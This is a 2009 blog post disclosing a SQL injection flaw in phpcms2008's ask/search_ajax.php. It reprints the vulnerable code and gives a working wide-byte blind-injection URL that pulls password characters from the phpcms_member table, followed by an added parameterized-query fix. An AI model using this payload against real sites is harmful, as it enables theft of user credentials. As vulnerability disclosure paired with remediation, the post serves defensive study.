夜火 Blog

phpcms2008 0day ask/search_ajax.php

2009-03-16

Affected software: phpcms2008 gbk

Vulnerable file: ask/search_ajax.php

<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
// $q is never assigned in this file; it arrives from the request (q= parameter).
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
    // Vulnerable: $q is interpolated directly into the WHERE clause.
    $where = " title LIKE '%$q%' AND status = 5";
}
else
{
    exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);

foreach($infos as $key=>$val)
{
    // Highlight the search term in each returned title.
    $val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
    $info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
    $info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
?>

Test method:

ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

via nuke
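
One way to close this hole, as an added example that is not phpcms code and not part of the original post: the same title search with $q bound as a query parameter instead of being interpolated into $where. The function name search_titles, the in-memory SQLite table and its rows are assumptions constructed for the demonstration.

```php
<?php
// Added example (not phpcms code): title search with $q bound as a parameter.
// Function name, table layout and rows are constructed for this demo.
function search_titles(PDO $db, string $q, int $limit = 10): array
{
    // Reject empty input and bytes that are not valid UTF-8, such as the
    // lone 0xE6 byte in the test request above.
    if ($q === '' || preg_match('//u', $q) !== 1) {
        return [];
    }
    // Escape LIKE wildcards so % and _ typed by the user match literally.
    $like = '%' . strtr($q, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $stmt = $db->prepare(
        "SELECT title, url FROM ask
          WHERE title LIKE :q ESCAPE '!' AND status = 5
          ORDER BY askid DESC LIMIT :n"
    );
    // Bound values are sent as data; quotes in $q never reach the SQL parser.
    $stmt->bindValue(':q', $like, PDO::PARAM_STR);
    $stmt->bindValue(':n', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ask (askid INTEGER PRIMARY KEY, title TEXT, url TEXT, status INTEGER)');
$db->exec("INSERT INTO ask (title, url, status) VALUES
    ('How to install phpcms', '/ask/1.html', 5),
    ('100% discount question', '/ask/2.html', 5),
    ('Unapproved phpcms draft', '/ask/3.html', 1)");

$inputs = [
    'phpcms',          // ordinary search term
    '%',               // wildcard, matched literally
    "x' OR 1=1 -- ",   // quote and SQL syntax stay inside the bound value
    "s\xE6'",          // invalid UTF-8, rejected before the query runs
];
foreach ($inputs as $q) {
    printf("%-22s => %s\n", rawurlencode($q), json_encode(search_titles($db, $q)));
}
```

Against MySQL, set the connection charset in the DSN and disable PDO::ATTR_EMULATE_PREPARES so that the server, not client-side quoting, handles the bound value.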

Author: 夜火
Published: 2009-03-16